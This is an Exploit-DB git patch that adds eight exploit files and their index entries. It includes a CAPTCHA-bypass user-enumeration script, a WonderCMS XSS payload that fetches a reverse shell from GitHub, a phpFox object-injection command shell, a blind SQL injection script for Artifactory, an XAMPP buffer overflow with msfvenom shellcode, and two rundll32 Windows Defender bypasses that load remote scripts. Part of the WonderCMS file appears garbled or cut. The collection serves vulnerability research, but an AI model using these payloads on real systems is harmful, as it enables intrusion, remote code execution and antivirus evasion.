From ba28fce1748cb3474ee6292f717fcd4858da4d1e Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Tue, 20 Feb 2024 00:16:25 +0000 Subject: [PATCH] DB: 2024-02-20 9 changes to exploits/shellcodes/ghdb SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration Wondercms 4.3.2 - XSS to RCE Employee Management System v1 - 'email' SQL Injection JFrog Artifactory < 7.25.4 - Blind SQL Injection phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit XAMPP - Buffer Overflow POC Microsoft Windows Defender - VBScript Detection Bypass Microsoft Windows Defender Bypass - Detection Mitigation Bypass --- exploits/multiple/webapps/51804.txt | 55 +++++++ exploits/multiple/webapps/51805.py | 57 ++++++++ exploits/php/webapps/51799.php | 81 +++++++++++ exploits/php/webapps/51803.txt | 71 +++++++++ exploits/php/webapps/51806.py | 49 +++++++ exploits/windows/dos/51800.py | 184 ++++++++++++++++++++++++ exploits/windows_x86-64/local/51801.txt | 86 +++++++++++ exploits/windows_x86-64/local/51802.txt | 82 +++++++++++ files_exploits.csv | 8 ++ 9 files changed, 673 insertions(+) create mode 100644 exploits/multiple/webapps/51804.txt create mode 100755 exploits/multiple/webapps/51805.py create mode 100644 exploits/php/webapps/51799.php create mode 100644 exploits/php/webapps/51803.txt create mode 100755 exploits/php/webapps/51806.py create mode 100755 exploits/windows/dos/51800.py create mode 100644 exploits/windows_x86-64/local/51801.txt create mode 100644 exploits/windows_x86-64/local/51802.txt diff --git a/exploits/multiple/webapps/51804.txt b/exploits/multiple/webapps/51804.txt new file mode 100644 index 000000000..7082f7345 --- /dev/null +++ b/exploits/multiple/webapps/51804.txt @@ -0,0 +1,55 @@ +# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration +# Date: 05/12/2023 +# Exploit Author: Jonas Benjamin Friedli +# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/ +# Version: <= 6.31 +# Tested on: 6.31 +# CVE : CVE-2023-3897 + +import requests +import sys + +def print_help(): + print("Usage: python script.py [URL] [UserListFile]") + sys.exit(1) + + +def main(): + if len(sys.argv) != 3 or sys.argv[1] == '-h': + print_help() + + url, user_list_file = sys.argv[1], sys.argv[2] + + try: + with open(user_list_file, 'r') as file: + users = file.read().splitlines() + except FileNotFoundError: + print(f"User list file '{user_list_file}' not found.") + sys.exit(1) + + valid_users = [] + bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest" + enumerate_txt = "This User ID/Email ID is not registered." + for index, user in enumerate(users): + progress = (index + 1) / len(users) * 100 + print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r") + + data = {"UserId": user} + response = requests.post( + f"{url}{bypass_dir}", + json=data, + headers={"Content-Type": "application/json; charset=utf-8"} + ) + + if response.status_code == 200: + response_data = response.json() + if enumerate_txt not in response_data.get('d', {}).get('message', ''): + valid_users.append(user) + + print("\nFinished processing users.") + print(f"Valid Users Found: {len(valid_users)}") + for user in valid_users: + print(user) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/51805.py b/exploits/multiple/webapps/51805.py new file mode 100755 index 000000000..eb7fac489 --- /dev/null +++ b/exploits/multiple/webapps/51805.py @@ -0,0 +1,57 @@ +# Author: prodigiousMind +# Exploit: Wondercms 4.3.2 XSS to RCE + + +import sys +import requests +import os +import bs4 + +if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252") +else: + data = ''' +var url = "'''+str(sys.argv[1])+'''"; +if (url.endsWith("/")) { + url = url.slice(0, -1); +} +var urlWithoutLog = url.split("/").slice(0, -1).join("/"); +var urlWithoutLogBase = new URL(urlWithoutLog).pathname; +var token = document.querySelectorAll('[name="token"]')[0].value; +var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token; +var xhr3 = new XMLHttpRequest(); +xhr3.withCredentials = true; +xhr3.open("GET", urlRev); +xhr3.send(); +xhr3.onload = function() { + if (xhr3.status == 200) { + var xhr4 = new XMLHttpRequest(); + xhr4.withCredentials = true; + xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php"); + xhr4.send(); + xhr4.onload = function() { + if (xhr4.status == 200) { + var ip = "'''+str(sys.argv[2])+'''"; + var port = "'''+str(sys.argv[3])+'''"; + var xhr5 = new XMLHttpRequest(); + xhr5.withCredentials = true; + xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port); + xhr5.send(); + + } + }; + } +}; +''' + try: + open("xss.js","w").write(data) + print("[+] xss.js is created") + print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3])) + print("----------------------------\n") + XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\">\n\n"); + +function encode($string) +{ + $string = addslashes(gzcompress($string, 9)); + return urlencode(strtr(base64_encode($string), '+/=', '-_,')); +} + +class Phpfox_Request +{ + private $_sName = "EgiX"; + private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;"; +} + +class Core_Objectify +{ + private $__toString; + + function __construct($callback) + { + $this->__toString = $callback; + } +} + +print "\n[+] Launching shell on {$argv[1]}\n"; + +$popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"])); +$popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain); + +$ch = curl_init(); + +curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect"); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); +curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); +curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain)); + +while(1) +{ + print "\nphpFox-shell# "; + if (($cmd = trim(fgets(STDIN))) == "exit") break; + curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); + preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n"); +} \ No newline at end of file diff --git a/exploits/php/webapps/51803.txt b/exploits/php/webapps/51803.txt new file mode 100644 index 000000000..0f864f3f9 --- /dev/null +++ b/exploits/php/webapps/51803.txt @@ -0,0 +1,71 @@ +# Exploit Title: Employee Management System v1 - 'email' SQL Injection +# Google Dork: N/A +# Application: Employee Management System +# Date: 19.02.2024 +# Bugs: SQL Injection +# Exploit Author: SoSPiro +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html +# Version: N/A +# Tested on: Windows 10 64 bit Wampserver +# CVE : N/A + + +## Vulnerability Description: + +In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information. + + +## Proof of Concept (PoC): + +An example attacker could input the following into the email field instead of a valid email address: + +In this case, the SQL query would look like: + +SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active' +As "1=1" is always true, the query would return positive results, allowing the attacker to log in. + + +## Vulnerable code section: +==================================================== +employee/Admin/login.php + +query($sql_website); +$row_website = mysqli_fetch_array($result_website); + + +if(isset($_POST['btnlogin'])){ + + +//Get Date +date_default_timezone_set('Africa/Lagos'); +$current_date = date('Y-m-d h:i:s'); + + +$email = $_POST['txtemail']; +$password = $_POST['txtpassword']; +$status = 'Active'; + + + $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."' and status = '".$status."'"; + $result = mysqli_query($conn, $sql); + +if (mysqli_num_rows($result) > 0) { + // output data of each row + ($row = mysqli_fetch_assoc($result)); + $_SESSION["email"] = $row['email']; + $_SESSION["password"] = $row['password']; + $_SESSION["phone"] = $row['phone']; + $firstname = $row['firstname']; + $_SESSION["firstname"] = $row['firstname']; + + $fa = $row['2FA']; + + } \ No newline at end of file diff --git a/exploits/php/webapps/51806.py b/exploits/php/webapps/51806.py new file mode 100755 index 000000000..f9b065c21 --- /dev/null +++ b/exploits/php/webapps/51806.py @@ -0,0 +1,49 @@ +# Exploit Title: artifactory low-privileged blind sql injection +# Google Dork: +# Date: +# Exploit Author: ardr +# Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection +# Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection +# Version: JFrog Artifactory prior to 7.25.4 +# Tested on: MySQL +# CVE : CVE-2021-3860 + +import requests, string, time +from sys import stdout,exit +import warnings +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd +# old script for CVE-2021-3860 +# log into artifactory with any user. there must be populated data in the system. a fresh install will not work. +# you will need to be able to capture a valid request to the below endpoint in order to run this script. +# once captured, replace the cookies and headers below + + +warnings.simplefilter('ignore',InsecureRequestWarning) + + +session = requests.session() +base = input("Please enter the base url: ") +url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true" +# headers = Replace this with captured headers from the above endpoint +pos = 1 +# cookies = Replace this with captured cookies from the above endpoint + + +while True: + for i in string.digits + '.': + data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"} + start = time.time() + r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False) + request_time = time.time() - start + if request_time > 5: + version += i + pos += 1 + stdout.write(i) + stdout.flush() + break + if len(version) >= 6: + stdout.write("\n") + print(f"Version found: MySQL {version}") + exit(0) \ No newline at end of file diff --git a/exploits/windows/dos/51800.py b/exploits/windows/dos/51800.py new file mode 100755 index 000000000..59d78a5d0 --- /dev/null +++ b/exploits/windows/dos/51800.py @@ -0,0 +1,184 @@ +# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH) +# Date: 2023-10-26 +# Author: Talson (@Ripp3rdoc) +# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe +# Version: 3.3.0 +# Tested on: Windows 11 +# CVE-2023-46517 + +########################################################## +# _________ _______ _ _______ _______ _ # +# \__ __/( ___ )( \ ( ____ \( ___ )( ( /| # +# ) ( | ( ) || ( | ( \/| ( ) || \ ( | # +# | | | (___) || | | (_____ | | | || \ | | # +# | | | ___ || | (_____ )| | | || (\ \) | # +# | | | ( ) || | ) || | | || | \ | # +# | | | ) ( || (____/\/\____) || (___) || ) \ | # +# )_( |/ \|(_______/\_______)(_______)|/ )_) # +# # +########################################################## + +# Proof-of-Concept Steps to Reproduce : + +# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini" +# 2.- Open the application (xampp-control.exe) +# 3.- Click on the "admin" button in front of Apache service. +# 4.- Profit + +# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/ + +# Greetingz to EMU TEAM (¬‿¬)⩙ + +from pwn import * +import shutil +import os.path + +buffer = "\x41" * 268 # 268 bytes to fill the buffer +nseh = "\x59\x71" # next SEH address — 0x00590071 (a harmless padding) +seh = "\x15\x43" # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ; +padd = "\x71" * 0x55 # padding + +eax_align = "\x47" # venetian pad/align +eax_align += "\x51" # push ecx +eax_align += "\x71" # venetian pad/align +eax_align += "\x58" # pop eax -> eax = 0019e1a0 +eax_align += "\x71" # venetian pad/align +eax_align += "\x05\x24\x11" # add eax,0x11002300 +eax_align += "\x71" # venetian pad/align +eax_align += "\x2d\x11\x11" # sub eax,0x11001100 -> eax = 0019F3DC +eax_align += "\x71" # venetian pad/align +eax_align += "\x50" # push eax +eax_align += "\x71" # pad to align the following ret +eax_align += "\xc3"; # ret into eax? + +# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin +# Payload size: 512 bytes +shellcode = ( + "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1" + "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx" + "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk" + "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML" + "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57" + "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA" + ) + +shellcode = buffer + nseh + seh + eax_align + padd + shellcode + + +check_file = os.path.isfile("c:\\xampp\\xampp-control.ini") + +if check_file: + + print("[!] Backup file found. Generating the POC file...") + pass +else: + # create backup + try: + shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak") + print("[+] Creating backup for xampp-control.ini...") + print("[+] Backup file created!") + except Exception as e: + print("[!] Failed creating a backup for xampp-control.ini: ", e) + +try: + + # Create the new file + with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file: + file.write(f"""[Common] + Edition= + Editor= + Browser={shellcode} + + Debug=0 + Debuglevel=0 + Language=en + TomcatVisible=1 + Minimized=0 + + [LogSettings] + Font=Arial + FontSize=10 + + [WindowSettings] + Left=-1 + Top=-1 + Width=682 + Height=441 + + [Autostart] + Apache=0 + MySQL=0 + FileZilla=0 + Mercury=0 + Tomcat=0 + + [Checks] + CheckRuntimes=1 + CheckDefaultPorts=1 + + [ModuleNames] + Apache=Apache + MySQL=MySQL + Mercury=Mercury + Tomcat=Tomcat + + [EnableModules] + Apache=1 + MySQL=1 + FileZilla=1 + Mercury=1 + Tomcat=1 + + [EnableServices] + Apache=1 + MySQL=1 + FileZilla=1 + Tomcat=1 + + [BinaryNames] + Apache=httpd.exe + MySQL=mysqld.exe + FileZilla=filezillaserver.exe + FileZillaAdmin=filezilla server interface.exe + Mercury=mercury.exe + Tomcat=tomcat8.exe + + [ServiceNames] + Apache=Apache2.4 + MySQL=mysql + FileZilla=FileZillaServer + Tomcat=Tomcat + [ServicePorts] + Apache=80 + ApacheSSL=443 + MySQL=3306 + FileZilla=21 + FileZill=14147 + Mercury1=25 + Mercury2=79 + Mercury3=105 + Mercury4=106 + Mercury5=110 + Mercury6=143 + Mercury7=2224 + TomcatHTTP=8080 + TomcatAJP=8009 + Tomcat=8005 + [UserConfigs] + Apache= + MySQL= + FileZilla= + Mercury= + Tomcat= + + [UserLogs] + Apache= + MySQL= + FileZilla= + Mercury= + Tomcat= + """) + print("[+] Created the POC!") + +except Exception as e: + print("[!] Failed creating the POC xampp-control.ini: ", e) \ No newline at end of file diff --git a/exploits/windows_x86-64/local/51801.txt b/exploits/windows_x86-64/local/51801.txt new file mode 100644 index 000000000..270f79e9a --- /dev/null +++ b/exploits/windows_x86-64/local/51801.txt @@ -0,0 +1,86 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + + +[Vendor] +www.microsoft.com + + +[Product] +Windows Defender + + +[Vulnerability Type] +Detection Mitigation Bypass +Backdoor:JS/Relvelshe.A + + +[CVE Reference] +N/A + + +[Security Issue] +Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated. +However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post. + + +[References] +https://twitter.com/hyp3rlinx/status/1480657623947091968 + + +[Exploit/POC] +1) python -m http.server 80 + +2) Open command prompt as Administrator + +3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp") + +Create file and host on server, this is contents of the "yo.tmp" file. + + + + + + + +[Network Access] +Local + + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: +February 18, 2024: Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows_x86-64/local/51802.txt b/exploits/windows_x86-64/local/51802.txt new file mode 100644 index 000000000..45779d213 --- /dev/null +++ b/exploits/windows_x86-64/local/51802.txt @@ -0,0 +1,82 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Windows Defender + + +[Vulnerability Type] +Windows Defender VBScript Detection Mitigation Bypass +TrojanWin32Powessere.G + + +[CVE Reference] +N/A + + +[Security Issue] +Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail +and attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript, this example leverages VBSCRIPT and ActiveX engine. + +Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender with +an "Access is denied" message. + +Trojan:Win32/Powessere.G +Category: Trojan +This program is dangerous and executes commands from an attacker. + +However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection. +Example, adding "shtml", "Lol" or other text and it will execute as of the time of this writing. + +E.g. + +C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) + + +[References] +https://twitter.com/hyp3rlinx/status/1759260962761150468 +https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt +https://lolbas-project.github.io/lolbas/Binaries/Rundll32/ + + +[Exploit/POC] +Open command prompt as Administrator + +C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) +Access is denied. + +C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) + +We win! + +[Network Access] +Local + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: +February 18, 2024 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index be86eb811..3cd043779 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -12215,6 +12215,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 14101,exploits/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,webapps,multiple,80,2010-06-28,2010-06-28,1,,,,,, 35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple,,2014-11-17,2014-11-17,0,CVE-2014-8728;OSVDB-110747,,,,, 51340,exploits/multiple/webapps/51340.txt,"Suprema BioStar 2 v2.8.16 - SQL Injection",2023-04-08,"Yuriy (Vander) Tsarenko",webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-27167,,,,, +51804,exploits/multiple/webapps/51804.txt,"SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration",2024-02-19,"Jonas Benjamin Friedli",webapps,multiple,,2024-02-19,2024-02-19,0,CVE-2023-3897,,,,, 50937,exploits/multiple/webapps/50937.txt,"Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Pankaj Kumar Thakur",webapps,multiple,,2022-05-17,2022-05-17,0,CVE-2022-29727,,,,, 37470,exploits/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",webapps,multiple,,2012-06-29,2015-07-03,1,CVE-2012-3414;OSVDB-83413,,,,,https://www.securityfocus.com/bid/54245/info 35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117564,,,,, @@ -12293,6 +12294,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48154,exploits/multiple/webapps/48154.sh,"Wing FTP Server 6.2.5 - Privilege Escalation",2020-03-02,"Cary Hooper",webapps,multiple,,2020-03-02,2020-03-02,0,,,,,, 43441,exploits/multiple/webapps/43441.txt,"WinMX < 2.6 - Design Error",2003-06-02,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00006,,,,,http://gulftech.org/advisories/WinMX%20Design%20Error/6 47342,exploits/multiple/webapps/47342.html,"Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery",2019-09-02,"Bhadresh Patel",webapps,multiple,,2019-09-02,2020-06-18,0,,,,,, +51805,exploits/multiple/webapps/51805.py,"Wondercms 4.3.2 - XSS to RCE",2024-02-19,"Anas Zakir",webapps,multiple,,2024-02-19,2024-02-19,0,,,,,, 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,, 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,, @@ -17863,6 +17865,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",2021-11-10,"Ragavender A G",webapps,php,,2021-11-10,2021-11-10,0,,,,,, 48882,exploits/php/webapps/48882.txt,"Employee Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,, 48881,exploits/php/webapps/48881.txt,"Employee Management System 1.0 - Cross Site Scripting (Stored)",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,, +51803,exploits/php/webapps/51803.txt,"Employee Management System v1 - 'email' SQL Injection",2024-02-19,SoSPiro,webapps,php,,2024-02-19,2024-02-19,0,,,,,, 49215,exploits/php/webapps/49215.txt,"Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting",2020-12-08,"Ritesh Gohil",webapps,php,,2020-12-08,2020-12-08,0,,,,,, 51049,exploits/php/webapps/51049.txt,"Employee Performance Evaluation System v1.0 - File Inclusion and RCE",2023-03-25,nu11secur1ty,webapps,php,,2023-03-25,2023-03-25,0,,,,,, 50467,exploits/php/webapps/50467.txt,"Employee Record Management System 1.2 - 'empid' SQL injection (Unauthenticated)",2021-11-02,"Anubhav Singh",webapps,php,,2021-11-02,2021-11-02,0,,,,,, @@ -20499,6 +20502,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38919,exploits/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,webapps,php,,2013-12-26,2015-12-09,1,CVE-2013-7209;OSVDB-101438,,,,,https://www.securityfocus.com/bid/64540/info 34441,exploits/php/webapps/34441.txt,"JForum 2.08 - BBCode Color Tag HTML Injection",2010-05-13,"Giorgio Fedon",webapps,php,,2010-05-13,2014-08-28,1,,,,,,https://www.securityfocus.com/bid/42414/info 34147,exploits/php/webapps/34147.txt,"JForum 2.1.8 - 'Username' Cross-Site Scripting",2010-06-06,"Adam Baldwin",webapps,php,,2010-06-06,2014-07-23,1,,,,,,https://www.securityfocus.com/bid/40880/info +51806,exploits/php/webapps/51806.py,"JFrog Artifactory < 7.25.4 - Blind SQL Injection",2024-02-19,ardr,webapps,php,,2024-02-19,2024-02-19,0,,,,,, 3760,exploits/php/webapps/3760.txt,"jGallery 1.3 - 'index.php' Remote File Inclusion",2007-04-18,Dj7xpl,webapps,php,,2007-04-17,,1,OSVDB-35021;CVE-2007-2158,,,,, 27307,exploits/php/webapps/27307.txt,"JGS-Gallery 4.0 - 'Board jgs_galerie_scroll.php?userid' Cross-Site Scripting",2006-02-23,nuker,webapps,php,,2006-02-23,2013-08-03,1,CVE-2006-0927;OSVDB-23632,,,,,https://www.securityfocus.com/bid/16810/info 27306,exploits/php/webapps/27306.txt,"JGS-Gallery 4.0 - 'jgs_galerie_slideshow.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-23,nuker,webapps,php,,2006-02-23,2013-08-03,1,CVE-2006-0927;OSVDB-23631,,,,,https://www.securityfocus.com/bid/16810/info @@ -26970,6 +26974,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 37697,exploits/php/webapps/37697.txt,"PHPFox 3.0.1 - 'ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-04,Crim3R,webapps,php,,2012-09-04,2015-07-27,1,,,,,,https://www.securityfocus.com/bid/55405/info 18655,exploits/php/webapps/18655.php,"PHPFox 3.0.1 - 'ajax.php' Remote Command Execution",2012-03-23,EgiX,webapps,php,,2012-03-23,2012-03-23,0,OSVDB-80534;CVE-2012-1300,,,,, 27430,exploits/php/webapps/27430.txt,"PHPFox 3.6.0 (build3) - Multiple SQL Injections",2013-08-08,"Matias Fontanini",webapps,php,,2013-08-08,2013-08-08,0,OSVDB-96028;CVE-2013-5121;CVE-2013-5120,,,,, +51799,exploits/php/webapps/51799.php,"phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit",2024-02-19,"Egidio Romano",webapps,php,,2024-02-19,2024-02-19,0,,,,,, 9465,exploits/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,webapps,php,,2009-08-17,,1,CVE-2009-3208;OSVDB-58191;OSVDB-58190,,,,, 32085,exploits/php/webapps/32085.txt,"PHPFreeChat 1.1 - 'demo21_with_hardocded_urls.php' Cross-Site Scripting",2008-07-18,ahmadbady,webapps,php,,2008-07-18,2014-03-06,1,,,,,,https://www.securityfocus.com/bid/30292/info 31822,exploits/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - '/part/menu.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,tan_prathan,webapps,php,,2008-05-22,2014-02-22,1,CVE-2008-6437;OSVDB-45608,,,,,https://www.securityfocus.com/bid/29337/info @@ -39143,6 +39148,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 4498,exploits/windows/dos/4498.pl,"WzdFTPD 0.8.0 - 'USER' Remote Denial of Service",2007-10-07,k1tk4t,dos,windows,,2007-10-06,2017-10-07,1,OSVDB-41636;CVE-2007-5300,,,,http://www.exploit-db.comwzdftpd-0.8.0.exe, 9242,exploits/windows/dos/9242.py,"WzdFTPD 8.0 - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",dos,windows,,2009-07-23,,1,,,,,, 11338,exploits/windows/dos/11338.py,"X-lite SIP 3.0 - 'wav' memory Corruption Heap Buffer Overflow",2010-02-06,TecR0c,dos,windows,,2010-02-05,,1,,,,,http://www.exploit-db.comX-Lite_Win32_1104o_56125_100106.exe, +51800,exploits/windows/dos/51800.py,"XAMPP - Buffer Overflow POC",2024-02-19,Talson,dos,windows,,2024-02-19,2024-02-19,0,,,,,, 40964,exploits/windows/dos/40964.py,"XAMPP Control Panel - Denial Of 